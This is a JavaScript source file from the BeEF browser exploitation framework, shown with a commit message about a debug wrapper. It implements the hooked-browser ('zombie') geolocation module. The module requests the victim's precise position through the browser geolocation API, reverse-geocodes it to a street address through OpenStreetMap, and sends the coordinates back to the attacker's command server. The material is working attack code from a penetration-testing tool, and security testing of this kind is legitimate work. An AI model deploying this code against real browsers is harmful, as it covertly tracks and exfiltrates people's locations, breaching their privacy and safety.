Add `beef.debug()` function - wraps `console.log()` Debug messages are suppressed for browsers which don't support `console.log()` Update './core/*' to use `beef.debug()` instead of `console.log()` Update './modules/*' to use `beef.debug()` instead of `console.log()` Update './extensions/*' to use `beef.debug()` instead of `console.log()` Add 'modules/debug/test_beef_debug/' module
101 lines
3.7 KiB
JavaScript
101 lines
3.7 KiB
JavaScript
//
|
|
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
|
|
// Browser Exploitation Framework (BeEF) - http://beefproject.com
|
|
// See the file 'doc/COPYING' for copying permission
|
|
//
|
|
|
|
/*!
|
|
* @literal object: beef.geolocation
|
|
*
|
|
* Provides functionalities to use the geolocation API.
|
|
*/
|
|
beef.geolocation = {
|
|
|
|
/**
|
|
* check if browser supports the geolocation API
|
|
*/
|
|
isGeolocationEnabled: function(){
|
|
return !!navigator.geolocation;
|
|
},
|
|
|
|
/*
|
|
* given latitude/longitude retrieves exact street position of the zombie
|
|
*/
|
|
getOpenStreetMapAddress: function(command_url, command_id, latitude, longitude){
|
|
|
|
// fixes damned issues with jquery 1.5, like this one:
|
|
// http://bugs.jquery.com/ticket/8084
|
|
$j.ajaxSetup({
|
|
jsonp: null,
|
|
jsonpCallback: null
|
|
});
|
|
|
|
$j.ajax({
|
|
error: function(xhr, status, error){
|
|
//beef.debug("[geolocation.js] openstreetmap error");
|
|
beef.net.send(command_url, command_id, "latitude=" + latitude
|
|
+ "&longitude=" + longitude
|
|
+ "&osm=UNAVAILABLE"
|
|
+ "&geoLocEnabled=True");
|
|
},
|
|
success: function(data, status, xhr){
|
|
//beef.debug("[geolocation.js] openstreetmap success");
|
|
var jsonResp = $j.parseJSON(data);
|
|
|
|
beef.net.send(command_url, command_id, "latitude=" + latitude
|
|
+ "&longitude=" + longitude
|
|
// + "&osm=" + encodeURI(jsonResp.display_name)
|
|
+ "&osm=tofix"
|
|
+ "&geoLocEnabled=True");
|
|
},
|
|
type: "get",
|
|
url: "http://nominatim.openstreetmap.org/reverse?format=json&lat=" +
|
|
latitude + "&lon=" + longitude + "&zoom=18&addressdetails=1"
|
|
});
|
|
|
|
},
|
|
|
|
/*
|
|
* retrieve latitude/longitude using the geolocation API
|
|
*/
|
|
getGeolocation: function (command_url, command_id){
|
|
|
|
if (!navigator.geolocation) {
|
|
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&longitude=NOT_ENABLED&geoLocEnabled=False");
|
|
return;
|
|
}
|
|
//beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
|
|
navigator.geolocation.getCurrentPosition( //note: this is an async call
|
|
function(position){ // success
|
|
var latitude = position.coords.latitude;
|
|
var longitude = position.coords.longitude;
|
|
//beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
|
|
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
|
|
|
|
}, function(error){ // failure
|
|
//beef.debug("[geolocation.js] error [%d] getting position", error.code);
|
|
switch(error.code) // Returns 0-3
|
|
{
|
|
case 0:
|
|
beef.net.send(command_url, command_id, "latitude=UNKNOWN_ERROR&longitude=UNKNOWN_ERROR&geoLocEnabled=False");
|
|
return;
|
|
case 1:
|
|
beef.net.send(command_url, command_id, "latitude=PERMISSION_DENIED&longitude=PERMISSION_DENIED&geoLocEnabled=False");
|
|
return;
|
|
case 2:
|
|
beef.net.send(command_url, command_id, "latitude=POSITION_UNAVAILABLE&longitude=POSITION_UNAVAILABLE&geoLocEnabled=False");
|
|
return;
|
|
case 3:
|
|
beef.net.send(command_url, command_id, "latitude=TIMEOUT&longitude=TIMEOUT&geoLocEnabled=False");
|
|
return;
|
|
}
|
|
beef.net.send(command_url, command_id, "latitude=UNKNOWN_ERROR&longitude=UNKNOWN_ERROR&geoLocEnabled=False");
|
|
},
|
|
{enableHighAccuracy:true, maximumAge:30000, timeout:27000}
|
|
);
|
|
}
|
|
}
|
|
|
|
|
|
beef.regCmp('beef.geolocation');
|